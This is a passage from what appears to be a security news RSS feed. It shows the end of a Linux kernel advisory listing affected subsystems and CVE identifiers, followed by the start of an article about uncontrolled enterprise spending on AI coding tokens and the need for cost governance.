  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - Kernel kexec() syscall;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - RCU subsystem;
  - Scheduler infrastructure;
  - Cryptographic library;
  - Scatterlist API;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - 9P file system network protocol;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - KCM (Kernel Connection Multiplexor) sockets driver;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - AppArmor security module;
  - Landlock security;
  - Simplified Mandatory Access Control Kernel framework;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40005, CVE-2025-40135, CVE-2025-40150, CVE-2025-68175,
CVE-2025-68239, CVE-2025-68334, CVE-2025-68736, CVE-2025-71152,
CVE-2025-71161, CVE-2025-71203, CVE-2025-71221, CVE-2025-71229,
CVE-2025-71231, CVE-2025-71232, CVE-2025-71233, CVE-2025-71235,
CVE-2025-71236, CVE-2025-71237, CVE-2025-71238, CVE-2025-71239,
CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2025-71269,
CVE-2025-71272, CVE-2025-71273, CVE-2025-71274, CVE-2025-71286,
CVE-2025-71287, CVE-2025-71288, CVE-2025-71291, CVE-2025-71292,
CVE-2025-71294, CVE-2025-71295, CVE-2025-71297, CVE-2025-71304,
CVE-2025-71305, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23100, CVE-2026-23104,
CVE-2026-23118, CVE-2026-23138, CVE-2026-23154, CVE-2026-23157,
CVE-2026-23169, CVE-2026-23171, CVE-2026-23220, CVE-2026-23221,
CVE-2026-23222, CVE-2026-23226, CVE-2026-23227, CVE-2026-23228,
CVE-2026-23229, CVE-2026-23230, CVE-2026-23233, CVE-2026-23234,
CVE-2026-23235, CVE-2026-23236, CVE-2026-23237, CVE-2026-23238,
CVE-2026-23241, CVE-2026-23242, CVE-2026-23243, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23249, CVE-2026-23253,
CVE-2026-23255, CVE-2026-23266, CVE-2026-23267, CVE-2026-23270,
CVE-2026-23271, CVE-2026-23272, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23278, CVE-2026-23279, CVE-2026-23281, CVE-2026-23284,
CVE-2026-23285, CVE-2026-23286, CVE-2026-23287, CVE-2026-23289,
CVE-2026-23290, CVE-2026-23291, CVE-2026-23292, CVE-2026-23293,
CVE-2026-23296, CVE-2026-23298, CVE-2026-23300, CVE-2026-23302,
CVE-2026-23303, CVE-2026-23304, CVE-2026-23306, CVE-2026-23307,
CVE-2026-23308, CVE-2026-23310, CVE-2026-23312, CVE-2026-23313,
CVE-2026-23315, CVE-2026-23317, CVE-2026-23318, CVE-2026-23319,
CVE-2026-23321, CVE-2026-23324, CVE-2026-23325, CVE-2026-23330,
CVE-2026-23334, CVE-2026-23335, CVE-2026-23336, CVE-2026-23339,
CVE-2026-23340, CVE-2026-23343, CVE-2026-23347, CVE-2026-23352,
CVE-2026-23356, CVE-2026-23357, CVE-2026-23359, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23392, CVE-2026-23395, CVE-2026-23396,
CVE-2026-23397, CVE-2026-23398, CVE-2026-23399, CVE-2026-23401,
CVE-2026-23412, CVE-2026-23413, CVE-2026-23414, CVE-2026-23418,
CVE-2026-23419, CVE-2026-23420, CVE-2026-23426, CVE-2026-23428,
CVE-2026-23434, CVE-2026-23438, CVE-2026-23439, CVE-2026-23440,
CVE-2026-23441, CVE-2026-23442, CVE-2026-23444, CVE-2026-23446,
CVE-2026-23447, CVE-2026-23448, CVE-2026-23449, CVE-2026-23450,
CVE-2026-23452, CVE-2026-23454, CVE-2026-23455, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31402, CVE-2026-31403, CVE-2026-31405, CVE-2026-31407,
CVE-2026-31408, CVE-2026-31409, CVE-2026-31411, CVE-2026-31412,
CVE-2026-31414, CVE-2026-31415, CVE-2026-31416, CVE-2026-31417,
CVE-2026-31418, CVE-2026-31421, CVE-2026-31422, CVE-2026-31423,
CVE-2026-31424, CVE-2026-31425, CVE-2026-31426, CVE-2026-31427,
CVE-2026-31428, CVE-2026-31429, CVE-2026-31430, CVE-2026-31432,
CVE-2026-31433, CVE-2026-31436, CVE-2026-31438, CVE-2026-31439,
CVE-2026-31440, CVE-2026-31441, CVE-2026-31446, CVE-2026-31447,
CVE-2026-31448, CVE-2026-31449, CVE-2026-31450, CVE-2026-31451,
CVE-2026-31452, CVE-2026-31453, CVE-2026-31454, CVE-2026-31455,
CVE-2026-31458, CVE-2026-31464, CVE-2026-31466, CVE-2026-31467,
CVE-2026-31469, CVE-2026-31470, CVE-2026-31473, CVE-2026-31474,
CVE-2026-31476, CVE-2026-31477, CVE-2026-31478, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31506, CVE-2026-31507, CVE-2026-31508,
CVE-2026-31509, CVE-2026-31510, CVE-2026-31511, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31516, CVE-2026-31518, CVE-2026-31519,
CVE-2026-31520, CVE-2026-31521, CVE-2026-31522, CVE-2026-31523,
CVE-2026-31524, CVE-2026-31525, CVE-2026-31527, CVE-2026-31528,
CVE-2026-31530, CVE-2026-31532, CVE-2026-31540, CVE-2026-31542,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31548, CVE-2026-31549,
CVE-2026-31550, CVE-2026-31551, CVE-2026-31552, CVE-2026-31554,
CVE-2026-31555, CVE-2026-31556, CVE-2026-31557, CVE-2026-31563,
CVE-2026-31565, CVE-2026-31566, CVE-2026-31570, CVE-2026-31575,
CVE-2026-31576, CVE-2026-31577, CVE-2026-31578, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31590, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31602,
CVE-2026-31603, CVE-2026-31604, CVE-2026-31605, CVE-2026-31606,
CVE-2026-31607, CVE-2026-31610, CVE-2026-31611, CVE-2026-31612,
CVE-2026-31613, CVE-2026-31615, CVE-2026-31616, CVE-2026-31617,
CVE-2026-31618, CVE-2026-31619, CVE-2026-31622, CVE-2026-31623,
CVE-2026-31624, CVE-2026-31625, CVE-2026-31626, CVE-2026-31627,
CVE-2026-31628, CVE-2026-31629, CVE-2026-31634, CVE-2026-31637,
CVE-2026-31638, CVE-2026-31639, CVE-2026-31642, CVE-2026-31645,
CVE-2026-31646, CVE-2026-31648, CVE-2026-31649, CVE-2026-31651,
CVE-2026-31655, CVE-2026-31656, CVE-2026-31657, CVE-2026-31658,
CVE-2026-31659, CVE-2026-31660, CVE-2026-31661, CVE-2026-31662,
CVE-2026-31664, CVE-2026-31665, CVE-2026-31667, CVE-2026-31668,
CVE-2026-31669, CVE-2026-31670, CVE-2026-31671, CVE-2026-31672,
CVE-2026-31673, CVE-2026-31674, CVE-2026-31675, CVE-2026-31677,
CVE-2026-31678, CVE-2026-31679, CVE-2026-31680, CVE-2026-31681,
CVE-2026-31682, CVE-2026-31683, CVE-2026-31684, CVE-2026-31685,
CVE-2026-31686, CVE-2026-31687, CVE-2026-31689, CVE-2026-31693,
CVE-2026-31694, CVE-2026-31695, CVE-2026-31696, CVE-2026-31697,
CVE-2026-31698, CVE-2026-31699, CVE-2026-31700, CVE-2026-31701,
CVE-2026-31702, CVE-2026-31704, CVE-2026-31705, CVE-2026-31706,
CVE-2026-31707, CVE-2026-31708, CVE-2026-31709, CVE-2026-31711,
CVE-2026-31712, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31720, CVE-2026-31721, CVE-2026-31722, CVE-2026-31723,
CVE-2026-31724, CVE-2026-31725, CVE-2026-31726, CVE-2026-31728,
CVE-2026-31729, CVE-2026-31730, CVE-2026-31731, CVE-2026-31737,
CVE-2026-31738, CVE-2026-31740, CVE-2026-31741, CVE-2026-31747,
CVE-2026-31748, CVE-2026-31749, CVE-2026-31751, CVE-2026-31752,
CVE-2026-31754, CVE-2026-31755, CVE-2026-31756, CVE-2026-31758,
CVE-2026-31759, CVE-2026-31761, CVE-2026-31762, CVE-2026-31763,
CVE-2026-31767, CVE-2026-31768, CVE-2026-31770, CVE-2026-31772,
CVE-2026-31773, CVE-2026-31778, CVE-2026-31779, CVE-2026-31780,
CVE-2026-31781, CVE-2026-31788, CVE-2026-43007, CVE-2026-43011,
CVE-2026-43012, CVE-2026-43013, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43016, CVE-2026-43017, CVE-2026-43018, CVE-2026-43019,
CVE-2026-43020, CVE-2026-43023, CVE-2026-43024, CVE-2026-43025,
CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030,
CVE-2026-43032, CVE-2026-43035, CVE-2026-43036, CVE-2026-43037,
CVE-2026-43038, CVE-2026-43040, CVE-2026-43041, CVE-2026-43043,
CVE-2026-43044, CVE-2026-43046, CVE-2026-43047, CVE-2026-43049,
CVE-2026-43050, CVE-2026-43051, CVE-2026-43052, CVE-2026-43054,
CVE-2026-43056, CVE-2026-43057, CVE-2026-43058, CVE-2026-43059,
CVE-2026-43060, CVE-2026-43061, CVE-2026-43062, CVE-2026-43064,
CVE-2026-43065, CVE-2026-43066, CVE-2026-43068, CVE-2026-43069,
CVE-2026-43071, CVE-2026-43072, CVE-2026-43073, CVE-2026-43074,
CVE-2026-43075, CVE-2026-43076, CVE-2026-43079, CVE-2026-43080,
CVE-2026-43081, CVE-2026-43082, CVE-2026-43085, CVE-2026-43086,
CVE-2026-43088, CVE-2026-43089, CVE-2026-43091, CVE-2026-43092,
CVE-2026-43093, CVE-2026-43094, CVE-2026-43098, CVE-2026-43099,
CVE-2026-43103, CVE-2026-43104, CVE-2026-43105, CVE-2026-43107,
CVE-2026-43109, CVE-2026-43110, CVE-2026-43111, CVE-2026-43112,
CVE-2026-43113, CVE-2026-43114, CVE-2026-43117, CVE-2026-43119,
CVE-2026-43120, CVE-2026-43123, CVE-2026-43124, CVE-2026-43128,
CVE-2026-43129, CVE-2026-43130, CVE-2026-43132, CVE-2026-43133,
CVE-2026-43134, CVE-2026-43135, CVE-2026-43136, CVE-2026-43137,
CVE-2026-43139, CVE-2026-43140, CVE-2026-43141, CVE-2026-43143,
CVE-2026-43145, CVE-2026-43147, CVE-2026-43148, CVE-2026-43149,
CVE-2026-43150, CVE-2026-43152, CVE-2026-43153, CVE-2026-43156,
CVE-2026-43157, CVE-2026-43158, CVE-2026-43159, CVE-2026-43162,
CVE-2026-43163, CVE-2026-43167, CVE-2026-43168, CVE-2026-43169,
CVE-2026-43170, CVE-2026-43171, CVE-2026-43173, CVE-2026-43175,
CVE-2026-43180, CVE-2026-43182, CVE-2026-43183, CVE-2026-43184,
CVE-2026-43185, CVE-2026-43186, CVE-2026-43187, CVE-2026-43189,
CVE-2026-43190, CVE-2026-43194, CVE-2026-43196, CVE-2026-43199,
CVE-2026-43200, CVE-2026-43201, CVE-2026-43202, CVE-2026-43203,
CVE-2026-43205, CVE-2026-43206, CVE-2026-43207, CVE-2026-43209,
CVE-2026-43211, CVE-2026-43214, CVE-2026-43215, CVE-2026-43218,
CVE-2026-43221, CVE-2026-43222, CVE-2026-43223, CVE-2026-43225,
CVE-2026-43226, CVE-2026-43227, CVE-2026-43230, CVE-2026-43231,
CVE-2026-43232, CVE-2026-43233, CVE-2026-43236, CVE-2026-43238,
CVE-2026-43239, CVE-2026-43241, CVE-2026-43242, CVE-2026-43244,
CVE-2026-43245, CVE-2026-43246, CVE-2026-43248, CVE-2026-43249,
CVE-2026-43250, CVE-2026-43251, CVE-2026-43252, CVE-2026-43253,
CVE-2026-43255, CVE-2026-43256, CVE-2026-43257, CVE-2026-43261,
CVE-2026-43262, CVE-2026-43264, CVE-2026-43265, CVE-2026-43266,
CVE-2026-43268, CVE-2026-43269, CVE-2026-43270, CVE-2026-43271,
CVE-2026-43273, CVE-2026-43275, CVE-2026-43277, CVE-2026-43278,
CVE-2026-43279, CVE-2026-43281, CVE-2026-43283, CVE-2026-43287,
CVE-2026-43288, CVE-2026-43289, CVE-2026-43291, CVE-2026-43295,
CVE-2026-43296, CVE-2026-43297, CVE-2026-43300, CVE-2026-43302,
CVE-2026-43304, CVE-2026-43312, CVE-2026-43313, CVE-2026-43314,
CVE-2026-43315, CVE-2026-43316, CVE-2026-43317, CVE-2026-43318,
CVE-2026-43319, CVE-2026-43320, CVE-2026-43324, CVE-2026-43327,
CVE-2026-43328, CVE-2026-43329, CVE-2026-43330, CVE-2026-43332,
CVE-2026-43333, CVE-2026-43334, CVE-2026-43336, CVE-2026-43338,
CVE-2026-43339, CVE-2026-43340, CVE-2026-43341, CVE-2026-43342,
CVE-2026-43343, CVE-2026-43345, CVE-2026-43350, CVE-2026-43355,
CVE-2026-43357, CVE-2026-43359, CVE-2026-43360, CVE-2026-43361,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43366, CVE-2026-43368,
CVE-2026-43370, CVE-2026-43372, CVE-2026-43373, CVE-2026-43377,
CVE-2026-43378, CVE-2026-43380, CVE-2026-43381, CVE-2026-43382,
CVE-2026-43383, CVE-2026-43384, CVE-2026-43386, CVE-2026-43387,
CVE-2026-43395, CVE-2026-43397, CVE-2026-43405, CVE-2026-43406,
CVE-2026-43407, CVE-2026-43408, CVE-2026-43409, CVE-2026-43411,
CVE-2026-43412, CVE-2026-43413, CVE-2026-43414, CVE-2026-43415,
CVE-2026-43419, CVE-2026-43420, CVE-2026-43421, CVE-2026-43424,
CVE-2026-43425, CVE-2026-43426, CVE-2026-43427, CVE-2026-43428,
CVE-2026-43429, CVE-2026-43430, CVE-2026-43432, CVE-2026-43436,
CVE-2026-43437, CVE-2026-43439, CVE-2026-43441, CVE-2026-43445,
CVE-2026-43448, CVE-2026-43449, CVE-2026-43450, CVE-2026-43451,
CVE-2026-43452, CVE-2026-43453, CVE-2026-43455, CVE-2026-43456,
CVE-2026-43457, CVE-2026-43458, CVE-2026-43459, CVE-2026-43466,
CVE-2026-43467, CVE-2026-43468, CVE-2026-43469, CVE-2026-43471,
CVE-2026-43472, CVE-2026-43473, CVE-2026-43475, CVE-2026-43476,
CVE-2026-43480, CVE-2026-43483, CVE-2026-43484, CVE-2026-43488,
CVE-2026-43490, CVE-2026-43491, CVE-2026-43492, CVE-2026-43493,
CVE-2026-43495, CVE-2026-43496, CVE-2026-43497, CVE-2026-43499,
CVE-2026-43501, CVE-2026-43502, CVE-2026-45834, CVE-2026-45835,
CVE-2026-45836, CVE-2026-45838, CVE-2026-45839, CVE-2026-45840,
CVE-2026-45841, CVE-2026-45842, CVE-2026-45843, CVE-2026-45844,
CVE-2026-45845, CVE-2026-45846, CVE-2026-45847, CVE-2026-45848,
CVE-2026-45849, CVE-2026-45851, CVE-2026-45852, CVE-2026-45855,
CVE-2026-45856, CVE-2026-45857, CVE-2026-45858, CVE-2026-45859,
CVE-2026-45860, CVE-2026-45861, CVE-2026-45862, CVE-2026-45864,
CVE-2026-45865, CVE-2026-45866, CVE-2026-45867, CVE-2026-45868,
CVE-2026-45869, CVE-2026-45870, CVE-2026-45871, CVE-2026-45872,
CVE-2026-45873, CVE-2026-45875, CVE-2026-45877, CVE-2026-45878,
CVE-2026-45879, CVE-2026-45880, CVE-2026-45881, CVE-2026-45882,
CVE-2026-45883, CVE-2026-45884, CVE-2026-45885, CVE-2026-45886,
CVE-2026-45890, CVE-2026-45891, CVE-2026-45893, CVE-2026-45895,
CVE-2026-45899, CVE-2026-45902, CVE-2026-45904, CVE-2026-45905,
CVE-2026-45910, CVE-2026-45911, CVE-2026-45912, CVE-2026-45913,
CVE-2026-45914, CVE-2026-45915, CVE-2026-45916, CVE-2026-45917,
CVE-2026-45919, CVE-2026-45920, CVE-2026-45921, CVE-2026-45923,
CVE-2026-45924, CVE-2026-45928, CVE-2026-45935, CVE-2026-45936,
CVE-2026-45938, CVE-2026-45941, CVE-2026-45942, CVE-2026-45943,
CVE-2026-45946, CVE-2026-45947, CVE-2026-45948, CVE-2026-45954,
CVE-2026-45956, CVE-2026-45957, CVE-2026-45958, CVE-2026-45960,
CVE-2026-45962, CVE-2026-45964, CVE-2026-45965, CVE-2026-45968,
CVE-2026-45969, CVE-2026-45970, CVE-2026-45972, CVE-2026-45973,
CVE-2026-45974, CVE-2026-45976, CVE-2026-45978, CVE-2026-45981,
CVE-2026-45982, CVE-2026-45983, CVE-2026-45984, CVE-2026-45985,
CVE-2026-45986, CVE-2026-45987, CVE-2026-45988, CVE-2026-45989,
CVE-2026-45991, CVE-2026-45994, CVE-2026-45996, CVE-2026-45997,
CVE-2026-45999, CVE-2026-46002, CVE-2026-46003, CVE-2026-46004,
CVE-2026-46005, CVE-2026-46006, CVE-2026-46007, CVE-2026-46009,
CVE-2026-46011, CVE-2026-46012, CVE-2026-46015, CVE-2026-46016,
CVE-2026-46018, CVE-2026-46019, CVE-2026-46021, CVE-2026-46022,
CVE-2026-46023, CVE-2026-46024, CVE-2026-46026, CVE-2026-46027,
CVE-2026-46031, CVE-2026-46033, CVE-2026-46037, CVE-2026-46038,
CVE-2026-46040, CVE-2026-46041, CVE-2026-46043, CVE-2026-46044,
CVE-2026-46046, CVE-2026-46047, CVE-2026-46049, CVE-2026-46050,
CVE-2026-46051, CVE-2026-46052, CVE-2026-46053, CVE-2026-46056,
CVE-2026-46058, CVE-2026-46061, CVE-2026-46062, CVE-2026-46063,
CVE-2026-46064, CVE-2026-46065, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46072, CVE-2026-46073, CVE-2026-46075,
CVE-2026-46076, CVE-2026-46077, CVE-2026-46078, CVE-2026-46079,
CVE-2026-46080, CVE-2026-46082, CVE-2026-46083, CVE-2026-46084,
CVE-2026-46086, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46094, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46101, CVE-2026-46102, CVE-2026-46103,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46115, CVE-2026-46116, CVE-2026-46117, CVE-2026-46119,
CVE-2026-46120, CVE-2026-46121, CVE-2026-46122, CVE-2026-46123,
CVE-2026-46124, CVE-2026-46125, CVE-2026-46126, CVE-2026-46127,
CVE-2026-46128, CVE-2026-46129, CVE-2026-46131, CVE-2026-46132,
CVE-2026-46133, CVE-2026-46135, CVE-2026-46136, CVE-2026-46137,
CVE-2026-46138, CVE-2026-46139, CVE-2026-46142, CVE-2026-46143,
CVE-2026-46144, CVE-2026-46145, CVE-2026-46146, CVE-2026-46149,
CVE-2026-46150, CVE-2026-46151, CVE-2026-46152, CVE-2026-46157,
CVE-2026-46159, CVE-2026-46160, CVE-2026-46161, CVE-2026-46163,
CVE-2026-46164, CVE-2026-46167, CVE-2026-46168, CVE-2026-46169,
CVE-2026-46172, CVE-2026-46173, CVE-2026-46174, CVE-2026-46176,
CVE-2026-46177, CVE-2026-46178, CVE-2026-46179, CVE-2026-46180,
CVE-2026-46184, CVE-2026-46185, CVE-2026-46186, CVE-2026-46187,
CVE-2026-46189, CVE-2026-46190, CVE-2026-46191, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46195, CVE-2026-46196, CVE-2026-46197,
CVE-2026-46198, CVE-2026-46199, CVE-2026-46200, CVE-2026-46201,
CVE-2026-46204, CVE-2026-46205, CVE-2026-46206, CVE-2026-46207,
CVE-2026-46208, CVE-2026-46209, CVE-2026-46211, CVE-2026-46212,
CVE-2026-46214, CVE-2026-46218, CVE-2026-46219, CVE-2026-46220,
CVE-2026-46225, CVE-2026-46226, CVE-2026-46227, CVE-2026-46229,
CVE-2026-46230, CVE-2026-46231, CVE-2026-46232, CVE-2026-46233,
CVE-2026-46234, CVE-2026-46235, CVE-2026-46236, CVE-2026-46238,
CVE-2026-46241, CVE-2026-46243, CVE-2026-46244, CVE-2026-46246,
CVE-2026-46247, CVE-2026-46249, CVE-2026-46250, CVE-2026-46251,
CVE-2026-46253, CVE-2026-46254, CVE-2026-46255, CVE-2026-46259,
CVE-2026-46260, CVE-2026-46261, CVE-2026-46265, CVE-2026-46266,
CVE-2026-46267, CVE-2026-46270, CVE-2026-46273, CVE-2026-46274,
CVE-2026-46280, CVE-2026-46282, CVE-2026-46285, CVE-2026-46286,
CVE-2026-46287, CVE-2026-46289, CVE-2026-46291, CVE-2026-46292,
CVE-2026-46293, CVE-2026-46294, CVE-2026-46296, CVE-2026-46299,
CVE-2026-46301, CVE-2026-46303, CVE-2026-46304, CVE-2026-46306,
CVE-2026-46307, CVE-2026-46312, CVE-2026-46314, CVE-2026-46319,
CVE-2026-46328, CVE-2026-52911, CVE-2026-52920, CVE-2026-52925,
CVE-2026-52933, CVE-2026-52936, CVE-2026-52951, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52957, CVE-2026-52958, CVE-2026-52961,
CVE-2026-52962, CVE-2026-52963, CVE-2026-52964, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52977, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52984, CVE-2026-52985, CVE-2026-52986, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53013, CVE-2026-53014, CVE-2026-53015,
CVE-2026-53016, CVE-2026-53021, CVE-2026-53022, CVE-2026-53023,
CVE-2026-53032, CVE-2026-53033, CVE-2026-53034, CVE-2026-53035,
CVE-2026-53036, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53052, CVE-2026-53056, CVE-2026-53058, CVE-2026-53059,
CVE-2026-53060, CVE-2026-53061, CVE-2026-53062, CVE-2026-53063,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53066, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53088, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53096, CVE-2026-53097, CVE-2026-53098, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53115, CVE-2026-53117,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53126, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53279, CVE-2026-53287, CVE-2026-53289,
CVE-2026-53291, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53303, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53314, CVE-2026-53320, CVE-2026-53369,
CVE-2026-53374, CVE-2026-53375, CVE-2026-53376, CVE-2026-53379,
CVE-2026-63838, CVE-2026-63843, CVE-2026-63844, CVE-2026-63845,
CVE-2026-63846, CVE-2026-63847, CVE-2026-63848, CVE-2026-63851,
CVE-2026-63852, CVE-2026-63854, CVE-2026-63855, CVE-2026-63856,
CVE-2026-63860, CVE-2026-63861, CVE-2026-63862, CVE-2026-63865,
CVE-2026-64018, CVE-2026-64034, CVE-2026-64164)]]></content:encoded>
</item>
<item>
<title><![CDATA[Getting a grip on shadow tokens and AI blowouts]]></title>
<description><![CDATA[Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and a clear case study in how limited oversight snowbal...]]></description>
<link>https://tsecurity.de/de/3691453/it-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691453/it-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</guid>
<pubDate>Fri, 24 Jul 2026 14:04:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and <a href="https://www.forbes.com/sites/janakirammsv/2026/05/17/uber-burns-its-2026-ai-budget-in-four-months-on-claude-code/">a clear case study</a> in how limited oversight snowballs into an AI blowout.</p>



<p class="wp-block-paragraph">This is a phenomenon I like to call “shadow tokens” — AI credits paid for by the company but largely invisible to decision-makers. Too many engineers have the final say over how much they consume and, therefore, what it costs. This all-you-can-eat attitude is part of the reason why <a href="https://www.theverge.com/tech/930447/microsoft-claude-code-discontinued-notepad">Microsoft is reportedly</a> winding down many internal licenses across key engineering teams and why <a href="https://www.thestreet.com/investing/the-next-phase-of-ai-spending-is-already-underway">one in five organizations</a> is missing its AI spend forecast by more than 50%.</p>



<p class="wp-block-paragraph">And the trend is only accelerating. By 2028, <a href="https://www.cio.com/article/4189149/ai-coding-token-costs-are-on-track-to-rival-human-payroll.html">Gartner predicts</a> that AI coding costs (driven by this kind of ungoverned consumption) will be as much per developer as the salary companies pay that person.</p>



<p class="wp-block-paragraph">LLMs and agents introduce a new class of variable cost that scales with behavior rather than headcount, putting enterprises on the hook for tools that balloon with workload. I don’t see this as enterprises overspending because they’re reckless — it’s down to a lack of managerial oversight, budget alignment that demands a proven return on investment, and engineer education on how much is too much.</p>



<p class="wp-block-paragraph">Going forward, CIOs need to thread the AI needle between governance that encourages transparency and reasonable spend without stifling innovation.</p>



<h2 class="wp-block-heading">When shadow tokens result in real costs</h2>



<p class="wp-block-paragraph">The issue is that AI isn’t a traditional line item. Previously, enterprise leaders onboarded software-as-a-service (SaaS) with a good idea of the total cost. An allocated software seat or annual contract was a known quantity. The cloud added some variation (with fluctuations depending on hosting size), but instances were still modelable. AI flips this status quo on its head — the unit of consumption is behavior and the cost is exponential.</p>



<p class="wp-block-paragraph">And these specifics aren’t immediately apparent at pilot. Tools can appear inexpensive in controlled experiments yet unpredictably scale depending on session length, context window size, model selection and whether agents run in parallel. This is the fallacy of the $20-per-seat enterprise plan — tokens are charged separately at API rates with no ceiling. The final dollar value of any session is set by factors that finance can’t always model in advance, particularly when these decisions usually rest with the engineers themselves.</p>



